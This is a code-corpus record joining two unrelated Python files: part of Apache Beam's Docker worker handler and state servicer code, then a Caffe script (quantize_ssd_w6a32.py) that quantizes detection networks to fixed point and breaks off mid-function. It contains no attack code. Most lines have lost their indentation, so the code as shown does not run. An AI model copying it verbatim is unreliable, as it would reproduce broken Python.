self.worker_thread = threading.Thread(
name='run_worker', target=self.worker.run)
self.worker_thread.start()
def stop_worker(self):
# type: () -> None
self.worker_thread.join()
@WorkerHandler.register_environment(
common_urns.environments.DOCKER.urn, beam_runner_api_pb2.DockerPayload)
class DockerSdkWorkerHandler(GrpcWorkerHandler):
def __init__(self,
payload, # type: beam_runner_api_pb2.DockerPayload
state, # type: StateServicer
provision_info, # type: ExtendedProvisionInfo
grpc_server # type: GrpcServer
):
# type: (...) -> None
super(DockerSdkWorkerHandler,
self).__init__(state, provision_info, grpc_server)
self._container_image = payload.container_image
self._container_id = None # type: Optional[bytes]
def host_from_worker(self):
# type: () -> str
if sys.platform == 'darwin':
# See https://docs.docker.com/docker-for-mac/networking/
return 'host.docker.internal'
if sys.platform == 'linux' and is_in_notebook():
import socket
# Gets ipv4 address of current host. Note the host is not guaranteed to
# be localhost because the python SDK could be running within a container.
return socket.gethostbyname(socket.getfqdn())
return super(DockerSdkWorkerHandler, self).host_from_worker()
def start_worker(self):
# type: () -> None
with SUBPROCESS_LOCK:
try:
_LOGGER.info('Attempting to pull image %s', self._container_image)
subprocess.check_call(['docker', 'pull', self._container_image])
except Exception:
_LOGGER.info(
'Unable to pull image %s, defaulting to local image if it exists' %
self._container_image)
self._container_id = subprocess.check_output([
'docker',
'run',
'-d',
# TODO: credentials
'--network=host',
self._container_image,
'--id=%s' % self.worker_id,
'--logging_endpoint=%s' % self.logging_api_service_descriptor().url,
'--control_endpoint=%s' % self.control_address,
'--artifact_endpoint=%s' % self.control_address,
'--provision_endpoint=%s' % self.control_address,
]).strip()
assert self._container_id is not None
while True:
status = subprocess.check_output([
'docker', 'inspect', '-f', '{{.State.Status}}', self._container_id
]).strip()
_LOGGER.info(
'Waiting for docker to start up. Current status is %s' %
status.decode('utf-8'))
if status == b'running':
_LOGGER.info(
'Docker container is running. container_id = %s, '
'worker_id = %s',
self._container_id,
self.worker_id)
break
elif status in (b'dead', b'exited'):
subprocess.call(['docker', 'container', 'logs', self._container_id])
raise RuntimeError(
'SDK failed to start. Final status is %s' %
status.decode('utf-8'))
time.sleep(1)
self._done = False
t = threading.Thread(target=self.watch_container)
t.daemon = True
t.start()
def watch_container(self):
# type: () -> None
while not self._done:
assert self._container_id is not None
status = subprocess.check_output(
['docker', 'inspect', '-f', '{{.State.Status}}',
self._container_id]).strip()
if status != b'running':
if not self._done:
logs = subprocess.check_output([
'docker', 'container', 'logs', '--tail', '10', self._container_id
],
stderr=subprocess.STDOUT)
_LOGGER.info(logs)
self.control_conn.abort(
RuntimeError(
'SDK exited unexpectedly. '
'Final status is %s. Final log line is %s' % (
status.decode('utf-8'),
logs.decode('utf-8').strip().split('\n')[-1])))
time.sleep(5)
def stop_worker(self):
# type: () -> None
self._done = True
if self._container_id:
with SUBPROCESS_LOCK:
subprocess.call(['docker', 'kill', self._container_id])
class WorkerHandlerManager(object):
"""
Manages creation of ``WorkerHandler``s.
Caches ``WorkerHandler``s based on environment id.
"""
def __init__(self,
environments, # type: Mapping[str, beam_runner_api_pb2.Environment]
job_provision_info # type: ExtendedProvisionInfo
):
# type: (...) -> None
self._environments = environments
self._job_provision_info = job_provision_info
self._cached_handlers = collections.defaultdict(
list) # type: DefaultDict[str, List[WorkerHandler]]
self._workers_by_id = {} # type: Dict[str, WorkerHandler]
self.state_servicer = StateServicer()
self._grpc_server = None # type: Optional[GrpcServer]
self._process_bundle_descriptors = {
} # type: Dict[str, beam_fn_api_pb2.ProcessBundleDescriptor]
def register_process_bundle_descriptor(self, process_bundle_descriptor):
# type: (beam_fn_api_pb2.ProcessBundleDescriptor) -> None
self._process_bundle_descriptors[
process_bundle_descriptor.id] = process_bundle_descriptor
def get_process_bundle_descriptor(self, request):
# type: (beam_fn_api_pb2.GetProcessBundleDescriptorRequest) -> beam_fn_api_pb2.ProcessBundleDescriptor
return self._process_bundle_descriptors[
request.process_bundle_descriptor_id]
def get_worker_handlers(
self,
environment_id, # type: Optional[str]
num_workers # type: int
):
# type: (...) -> List[WorkerHandler]
if environment_id is None:
# Any environment will do, pick one arbitrarily.
environment_id = next(iter(self._environments.keys()))
environment = self._environments[environment_id]
# assume all environments except EMBEDDED_PYTHON use gRPC.
if environment.urn == python_urns.EMBEDDED_PYTHON:
# special case for EmbeddedWorkerHandler: there's no need for a gRPC
# server, but we need to pass self instead. Cast to make the type check
# on WorkerHandler.create() think we have a GrpcServer instance.
grpc_server = cast(GrpcServer, self)
elif self._grpc_server is None:
self._grpc_server = GrpcServer(
self.state_servicer, self._job_provision_info, self)
grpc_server = self._grpc_server
else:
grpc_server = self._grpc_server
worker_handler_list = self._cached_handlers[environment_id]
if len(worker_handler_list) < num_workers:
for _ in range(len(worker_handler_list), num_workers):
worker_handler = WorkerHandler.create(
environment,
self.state_servicer,
self._job_provision_info.for_environment(environment),
grpc_server)
_LOGGER.info(
"Created Worker handler %s for environment %s (%s, %r)",
worker_handler,
environment_id,
environment.urn,
environment.payload)
self._cached_handlers[environment_id].append(worker_handler)
self._workers_by_id[worker_handler.worker_id] = worker_handler
worker_handler.start_worker()
return self._cached_handlers[environment_id][:num_workers]
def close_all(self):
# type: () -> None
for worker_handler_list in self._cached_handlers.values():
for worker_handler in set(worker_handler_list):
try:
worker_handler.close()
except Exception:
_LOGGER.error(
"Error closing worker_handler %s" % worker_handler, exc_info=True)
self._cached_handlers = {} # type: ignore[assignment]
self._workers_by_id = {}
if self._grpc_server is not None:
self._grpc_server.close()
self._grpc_server = None
def get_worker(self, worker_id):
# type: (str) -> WorkerHandler
return self._workers_by_id[worker_id]
class StateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer,
sdk_worker.StateHandler):
class CopyOnWriteState(object):
def __init__(self, underlying):
# type: (DefaultDict[bytes, Buffer]) -> None
self._underlying = underlying
self._overlay = {} # type: Dict[bytes, Buffer]
def __getitem__(self, key):
# type: (bytes) -> Buffer
if key in self._overlay:
return self._overlay[key]
else:
return StateServicer.CopyOnWriteList(
self._underlying, self._overlay, key)
def __delitem__(self, key):
# type: (bytes) -> None
self._overlay[key] = []
def commit(self):
# type: () -> DefaultDict[bytes, Buffer]
self._underlying.update(self._overlay)
return self._underlying
class CopyOnWriteList(object):
def __init__(self,
underlying, # type: DefaultDict[bytes, Buffer]
overlay, # type: Dict[bytes, Buffer]
key # type: bytes
):
# type: (...) -> None
self._underlying = underlying
self._overlay = overlay
self._key = key
def __iter__(self):
# type: () -> Iterator[bytes]
if self._key in self._overlay:
return iter(self._overlay[self._key])
else:
return iter(self._underlying[self._key])
def append(self, item):
# type: (bytes) -> None
if self._key not in self._overlay:
self._overlay[self._key] = list(self._underlying[self._key])
self._overlay[self._key].append(item)
StateType = Union[CopyOnWriteState, DefaultDict[bytes, Buffer]]
def __init__(self):
# type: () -> None
self._lock = threading.Lock()
self._state = collections.defaultdict(list) # type: StateServicer.StateType
self._checkpoint = None # type: Optional[StateServicer.StateType]
self._use_continuation_tokens = False
self._continuations = {} # type: Dict[bytes, Tuple[bytes, ...]]
def checkpoint(self):
# type: () -> None
assert self._checkpoint is None and not \
isinstance(self._state, StateServicer.CopyOnWriteState)
self._checkpoint = self._state
self._state = StateServicer.CopyOnWriteState(self._state)
def commit(self):
# type: () -> None
assert isinstance(self._state,
StateServicer.CopyOnWriteState) and \
isinstance(self._checkpoint,
StateServicer.CopyOnWriteState)
self._state.commit()
self._state = self._checkpoint.commit()
self._checkpoint = None
def restore(self):
# type: () -> None
assert self._checkpoint is not None
self._state = self._checkpoint
self._checkpoint = None
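  # Taken together, checkpoint(), commit() and restore() implement a simple
  # copy-on-write snapshot: checkpoint() saves the current dict and redirects
  # subsequent writes into a CopyOnWriteState overlay, commit() folds that
  # overlay back into the underlying dict, and restore() discards the overlay
  # and reinstates the saved state.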
@contextlib.contextmanager
def process_instruction_id(self, unused_instruction_id):
# type: (Any) -> Iterator
yield
def get_raw(self,
state_key, # type: beam_fn_api_pb2.StateKey
continuation_token=None # type: Optional[bytes]
):
# type: (...) -> Tuple[bytes, Optional[bytes]]
with self._lock:
full_state = self._state[self._to_key(state_key)]
if self._use_continuation_tokens:
# The token is "nonce:index".
if not continuation_token:
token_base = b'token_%x' % len(self._continuations)
self._continuations[token_base] = tuple(full_state)
return b'', b'%s:0' % token_base
else:
token_base, index = continuation_token.split(b':')
ix = int(index)
full_state_cont = self._continuations[token_base]
if ix == len(full_state_cont):
return b'', None
else:
return full_state_cont[ix], b'%s:%d' % (token_base, ix + 1)
else:
assert not continuation_token
return b''.join(full_state), None
def append_raw(
self,
state_key, # type: beam_fn_api_pb2.StateKey
data # type: bytes
):
# type: (...) -> _Future
with self._lock:
self._state[self._to_key(state_key)].append(data)
return _Future.done()
def clear(self, state_key):
# type: (beam_fn_api_pb2.StateKey) -> _Future
with self._lock:
try:
del self._state[self._to_key(state_key)]
except KeyError:
# This may happen with the caching layer across bundles. Caching may
# skip this storage layer for a blocking_get(key) request. Without
# the caching, the state for a key would be initialized via the
# defaultdict that _state uses.
pass
return _Future.done()
def done(self):
# type: () -> None
pass
@staticmethod
def _to_key(state_key):
# type: (beam_fn_api_pb2.StateKey) -> bytes
return state_key.SerializeToString()
class GrpcStateServicer(beam_fn_api_pb2_grpc.BeamFnStateServicer):
def __init__(self, state):
# type: (StateServicer) -> None
self._state = state
def State(self,
request_stream, # type: Iterable[beam_fn_api_pb2.StateRequest]
context=None # type: Any
):
# type: (...) -> Iterator[beam_fn_api_pb2.StateResponse]
# Note that this eagerly mutates state, assuming any failures are fatal.
# Thus it is safe to ignore instruction_id.
for request in request_stream:
request_type = request.WhichOneof('request')
if request_type == 'get':
data, continuation_token = self._state.get_raw(
request.state_key, request.get.continuation_token)
yield beam_fn_api_pb2.StateResponse(
id=request.id,
get=beam_fn_api_pb2.StateGetResponse(
data=data, continuation_token=continuation_token))
elif request_type == 'append':
self._state.append_raw(request.state_key, request.append.data)
yield beam_fn_api_pb2.StateResponse(
id=request.id, append=beam_fn_api_pb2.StateAppendResponse())
elif request_type == 'clear':
self._state.clear(request.state_key)
yield beam_fn_api_pb2.StateResponse(
id=request.id, clear=beam_fn_api_pb2.StateClearResponse())
else:
raise NotImplementedError('Unknown state request: %s' % request_type)
class SingletonStateHandlerFactory(sdk_worker.StateHandlerFactory):
"""A singleton cache for a StateServicer."""
def __init__(self, state_handler):
# type: (sdk_worker.CachingStateHandler) -> None
self._state_handler = state_handler
def create_state_handler(self, api_service_descriptor):
# type: (endpoints_pb2.ApiServiceDescriptor) -> sdk_worker.CachingStateHandler
"""Returns the singleton state handler."""
return self._state_handler
def close(self):
# type: () -> None
"""Does nothing."""
pass
class ControlFuture(object):
def __init__(self,
instruction_id, # type: str
response=None # type: Optional[beam_fn_api_pb2.InstructionResponse]
):
# type: (...) -> None
self.instruction_id = instruction_id
self._response = response
if response is None:
self._condition = threading.Condition()
self._exception = None # type: Optional[Exception]
def is_done(self):
# type: () -> bool
return self._response is not None
def set(self, response):
# type: (beam_fn_api_pb2.InstructionResponse) -> None
with self._condition:
self._response = response
self._condition.notify_all()
def get(self, timeout=None):
# type: (Optional[float]) -> beam_fn_api_pb2.InstructionResponse
if not self._response and not self._exception:
with self._condition:
if not self._response and not self._exception:
self._condition.wait(timeout)
if self._exception:
raise self._exception
else:
assert self._response is not None
return self._response
def abort(self, exception):
# type: (Exception) -> None
with self._condition:
self._exception = exception
self._condition.notify_all()
|
quantize_ssd_w6a32.py
|
#!/usr/bin/env python
# --------------------------------------------------------
# Quantize Fast R-CNN based Network
# Written by Chia-Chi Tsai
# --------------------------------------------------------
"""Quantize a Fast R-CNN network on an image database."""
import os
os.environ['GLOG_minloglevel'] = '2'
import _init_paths
from fast_rcnn.test import test_net, test_net_silent, im_detect
from fast_rcnn.config import cfg, cfg_from_file, cfg_from_list
from datasets.factory import get_imdb
import caffe
import argparse
import pprint
import time, os, sys
import numpy as np
from caffe.proto import caffe_pb2
import google.protobuf.text_format as txtf
import math
import cv2
from utils.timer import Timer
import multiprocessing
import json
import shutil
import warnings
warnings.filterwarnings("ignore")
from utils.timer import Timer
from subprocess import check_output
def parse_args():
"""
Parse input arguments
"""
parser = argparse.ArgumentParser(description='Quantize a Fast R-CNN network')
parser.add_argument('--gpu', dest='gpu_id', help='GPU id to use',
default=0, type=int)
parser.add_argument('--def', dest='prototxt',
help='prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant', dest='prototxt_quantized',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--def_quant_BAC', dest='prototxt_quantized_BAC',
help='quantized prototxt file defining the network',
default=None, type=str)
parser.add_argument('--act_analysis', dest='act_analysis',
help='input and output analysis file',
default=None, type=str)
parser.add_argument('--accumulator_analysis', dest='accumulator_analysis',
help='adder and multiplier analysis file',
default=None, type=str)
parser.add_argument('--net', dest='caffemodel',
help='model to test',
default=None, type=str)
parser.add_argument('--cfg', dest='cfg_file',
help='optional config file', default=None, type=str)
parser.add_argument('--imdb', dest='imdb_name',
help='dataset to test',
default='voc_2007_test', type=str)
parser.add_argument('--comp', dest='comp_mode', help='competition mode',
action='store_true')
parser.add_argument('--set', dest='set_cfgs',
help='set config keys', default=None,
nargs=argparse.REMAINDER)
parser.add_argument('--vis', dest='vis', help='visualize detections',
action='store_true')
parser.add_argument('--num_dets', dest='max_per_image',
help='max number of detections per image',
default=100, type=int)
parser.add_argument('--error_margin', dest='error_margin',
help='tolerance error of quantized network',
default=0.1, type=float)
if len(sys.argv) == 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
return args
def analyze_network(net_proto):
has_fc = False
has_deconv = False
has_conv = False
for l in net_proto.layer:
if l.type == 'Convolution':
has_conv = True
elif l.type == 'Deconvolution':
has_deconv = True
elif l.type =='InnerProduct':
has_fc = True
return has_conv, has_deconv, has_fc
# convert network to quantized network with 32 bit width
def convert_net_to_qnet(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='InnerProduct':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
elif l.type =='Deconvolution':
l.type = 'DeconvolutionRistretto'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_layer_in = 32
l.quantization_param.bw_layer_out = 32
l.quantization_param.bw_params = 32
l.quantization_param.fl_layer_in = 16
l.quantization_param.fl_layer_out= 16
l.quantization_param.fl_params = 16
l.quantization_param.rounding_time = 0
write_to_prototxt(net_proto, q_net_path)
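# Example of the blob renaming above: an in-place layer with top == bottom ==
# 'conv1' gets its top renamed to 'conv1/t'; a second in-place layer on the
# same blob then reads 'conv1/t' and writes 'conv1/t/t', so every intermediate
# tensor ends up with a unique name before quantization parameters are attached.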
# convert network to quantized network with 32 bit width
def convert_net_to_qnet_BAC_analysis(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.precision = 0 #DYNAMIC_FIXED_POINT
l.quantization_param.bw_add = 32
l.quantization_param.bw_multiply = 32
l.quantization_param.fl_add = 16
l.quantization_param.fl_multiply = 16
l.quantization_param.rounding_time = 1
l.quantization_param.analyze_mode = 3
write_to_prototxt(net_proto, q_net_path)
def convert_net_to_qnet_BAC(ori_net_path, q_net_path):
net_proto = read_from_prototxt(ori_net_path)
new_blob_name = {}
for l in net_proto.layer:
for i in range(len(l.top)):
for j in range(len(l.bottom)):
if l.top[i] == l.bottom[j]:
if not l.top[i] in new_blob_name.keys():
new_blob_name[l.top[i]]=l.top[i]+'/t'
else:
l.bottom[j] = new_blob_name[l.bottom[j]]
new_blob_name[l.top[i]]=new_blob_name[l.top[i]]+'/t'
l.top[i] = new_blob_name[l.top[i]]
else:
for k in range(len(l.bottom)):
if l.bottom[k] in new_blob_name.keys():
l.bottom[k] = new_blob_name[l.bottom[k]]
if l.type == 'Convolution' or l.type == 'ConvolutionIVS':
l.type = 'ConvolutionIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
if l.type == 'InnerProduct' or l.type == 'FcIVS':
l.type = 'FcIVS'
l.quantization_param.analyze_mode = 0
l.quantization_param.rounding_time = 1
write_to_prototxt(net_proto, q_net_path)
#change single layer bit width
def change_layer_bw(net_proto, layer_name,
bw_layer_in, fl_layer_in,
bw_layer_out, fl_layer_out,
bw_params, fl_params,
bw_add, fl_add,
bw_multiply, fl_multiply):
for l in net_proto.layer:
if l.name == layer_name:
l.quantization_param.precision = 0
l.quantization_param.bw_layer_in = int(bw_layer_in)
l.quantization_param.bw_layer_out = int(bw_layer_out)
l.quantization_param.bw_params = int(bw_params)
l.quantization_param.bw_add = int(bw_add)
l.quantization_param.bw_multiply = int(bw_multiply)
l.quantization_param.fl_layer_in = int(fl_layer_in)
l.quantization_param.fl_layer_out= int(fl_layer_out)
l.quantization_param.fl_params = int(fl_params)
l.quantization_param.fl_add = int(fl_add)
l.quantization_param.fl_multiply = int(fl_multiply)
return net_proto
def change_layer_BAC_bw(net_proto, layer_name,
                        bw_add, fl_add,
                        bw_multiply, fl_multiply):
    for l in net_proto.layer:
        if l.name == layer_name:
            l.quantization_param.bw_add = bw_add
            l.quantization_param.fl_add = fl_add
            l.quantization_param.bw_multiply = bw_multiply
            l.quantization_param.fl_multiply = fl_multiply
    return net_proto
def change_layer_bottom_name(net_proto, layer_name,
layer_bottom_name):
for l in net_proto.layer:
if l.name == layer_name:
l.bottom = layer_bottom_name
return net_proto
def change_layer_top_name(net_proto, layer_name,
layer_top_name):
for l in net_proto.layer:
if l.name == layer_name:
l.top = layer_top_name
return net_proto
#calculate needed Integer Length of layer parameters
def calc_layer_param_IL(net,layer):
percentile = 0.015
layer_param = net.params[layer.name]
#max_weight = max(layer_param[0].data[...].max(), layer_param[0].data[...].min(), key=abs)
weight_sorted = np.sort(layer_param[0].data[...], axis=None)
max_weight = max(weight_sorted[int(len(weight_sorted)*percentile)], weight_sorted[-1*int(len(weight_sorted)*percentile)],key=abs)
if layer.convolution_param.bias_term:
bias_sorted = np.sort(layer_param[1].data[...], axis=None)
max_bias = max(bias_sorted[int(len(bias_sorted)*percentile)], bias_sorted[-1*int(len(bias_sorted)*percentile)],key=abs)
#max_bias = max(layer_param[1].data[...].max(), layer_param[1].data[...].min(), key=abs)
else:
max_bias = 0
#print layer.name, max_weight, max(weight_sorted[0],weight_sorted[-1],key=abs), max(weight_sorted[int(len(weight_sorted)/100)], weight_sorted[-1*int(len(weight_sorted)/100)],key=abs)
max_param = max(max_weight, max_bias, key=abs)
return math.ceil(math.log(abs(max_param), 2)) + 1
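# Worked example: if the largest-magnitude parameter that survives the
# percentile clipping above is 5.3, the integer length is
# ceil(log2(5.3)) + 1 = 3 + 1 = 4 bits, i.e. enough integer bits (including
# the sign) to cover magnitudes up to 5.3.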
def analyze_net_param_IL(net, net_proto):
net_param_IL = dict()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_param_IL[layer.name] = calc_layer_param_IL(net, layer)
return net_param_IL
#calculate needed Integer Length of layer output
def calc_layer_inout_IL(net, layer_bottom_name):
layer_output = net.blobs[layer_bottom_name].data
layer_output_max = abs(max(layer_output.max(), layer_output.min(), key=abs))
#if layer_bottom_name == 'data':
# print net.blobs[layer_bottom_name].data
# print math.ceil(math.log(layer_output_max, 2)) + 1
return math.ceil(math.log(layer_output_max, 2)) + 1
def analyze_net_output_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_output_IL = dict()
net_input_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_output_IL[layer.name] = -sys.maxint - 1
net_input_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
net_output_IL[layer.name] = max(calc_layer_inout_IL(net, layer.top[0]), net_output_IL[layer.name])
net_input_IL[layer.name] = max(calc_layer_inout_IL(net, layer.bottom[0]), net_input_IL[layer.name])
#print layer.type, layer.name, net_output_IL[layer.name],net_input_IL[layer.name]
return net_output_IL, net_input_IL
#calculate needed Integer Length of layer adder
def calc_layer_adder_IL(net, layer_top_name):
layer_adder_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[0],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[1],
key=abs))
return math.ceil(math.log(layer_adder_max, 2)) + 1
#calculate needed Integer Length of layer multiplier
def calc_layer_multiplier_IL(net, layer_top_name):
layer_multiplier_max = abs(max(
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[2],
net.blobs[layer_top_name].data.reshape(net.blobs[layer_top_name].data.size)[3],
key=abs))
return math.ceil(math.log(layer_multiplier_max, 2)) + 1
#analyze adder and multiplier of each layer in network
def analyze_net_adder_multiplier_IL(net, net_proto):
#num_images = len(imdb.image_index)
#_t = {'im_preproc': Timer(), 'im_net' : Timer(), 'im_postproc': Timer(), 'misc' : Timer()}
#if not cfg.TEST.HAS_RPN:
# roidb = imdb.roidb
net_adder_IL = dict()
net_multiplier_IL = dict()
for layer in net_proto.layer:
#if layer.top[0] == layer.bottom[0]:
# print layer.name, layer.type
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' :
net_adder_IL[layer.name] = -sys.maxint - 1
assert layer.top[0] != layer.bottom[0],"bottom name cannot be the same as top name in the same layer, at layer:{} top:{} bottom:{}".format(layer.name,layer.top[0],layer.bottom[0])
net_multiplier_IL[layer.name] = -sys.maxint - 1
for i in xrange(num_iters):
#if cfg.TEST.HAS_RPN:
# box_proposals = None
#else:
# box_proposals = roidb[i]['boxes'][roidb[i]['gt_classes'] == 0]
#im = cv2.imread(imdb.image_path_at(i))
#scores, boxes = im_detect(net, im, _t, box_proposals)
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
net.params[layer.name][0].data[0][0][0][0]=2610214
elif layer.type == 'FcIVS':
net.params[layer.name][0].data[0][0]=2610214
net.forward()
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
net_adder_IL[layer.name] = max(calc_layer_adder_IL(net, layer.top[0]),
net_adder_IL[layer.name])
net_multiplier_IL[layer.name] = max(calc_layer_multiplier_IL(net, layer.top[0]),
net_multiplier_IL[layer.name])
return net_adder_IL, net_multiplier_IL
#quantize adder in network
def quantize_net_adder(net_proto, net_adder_IL, adder_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
adder_IL = net_adder_IL[layer.name] + extra_IL
adder_FL = adder_bw - adder_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
adder_bw, adder_FL, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
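# Example: with adder_bw = 16 and a required integer length of 6 bits
# (net_adder_IL[layer.name] + extra_IL), the accumulator keeps
# adder_FL = 16 - 6 = 10 fractional bits for that layer.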
#quantize multiplier in network
def quantize_net_multiplier(net_proto, net_multiplier_IL, multiplier_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS':
multiplier_IL = net_multiplier_IL[layer.name] + extra_IL
multiplier_FL = multiplier_bw - multiplier_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
multiplier_bw, multiplier_FL, \
)
#quantize input and output of each layer in network
def quantize_net_output(net_proto, net_output_IL, net_input_IL, output_bw, extra_IL):
input_bw = output_bw;
#input_FL = 0;
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS' \
or layer.type == 'FcIVS' \
or layer.type == 'DeconvolutionRistretto':
output_IL = net_output_IL[layer.name] + extra_IL
output_FL = output_bw - output_IL
input_IL = net_input_IL[layer.name] + extra_IL
input_FL = input_bw - input_IL
#if layer.name=='conv1_1/conv':
# print input_IL,output_IL
#print layer.name
#if layer.name == 'conv1_1/conv':
# print output_IL
# continue
change_layer_bw(net_proto, layer.name, \
input_bw, input_FL, \
output_bw, output_FL, \
layer.quantization_param.bw_params, \
layer.quantization_param.fl_params, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#input_FL = output_FL
#quantize convolution layers in network
def quantize_net_conv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'ConvolutionIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize fully connected layer in network
def quantize_net_fc(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'FcIVS':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#quantize deconvolution layer in network
def quantize_net_deconv(net_proto, net_param_IL, weighting_bw, extra_IL):
for layer in net_proto.layer:
if layer.type == 'DeconvolutionRistretto':
weighting_IL = net_param_IL[layer.name] + extra_IL
weighting_FL = weighting_bw - weighting_IL
change_layer_bw(net_proto, layer.name, \
layer.quantization_param.bw_layer_in, \
layer.quantization_param.fl_layer_in, \
layer.quantization_param.bw_layer_out, \
layer.quantization_param.fl_layer_out, \
weighting_bw, weighting_FL, \
layer.quantization_param.bw_add, \
layer.quantization_param.fl_add, \
layer.quantization_param.bw_multiply, \
layer.quantization_param.fl_multiply, \
)
#read network spec in prototxt
def read_from_prototxt(ori_net_path):
net_proto = caffe_pb2.NetParameter()
fn = ori_net_path;
with open(fn) as f:
s = f.read()
txtf.Merge(s, net_proto)
return net_proto
#write network spec to prototxt
def write_to_prototxt(net_proto, out_net_path):
outf = out_net_path
#print 'writing', outf
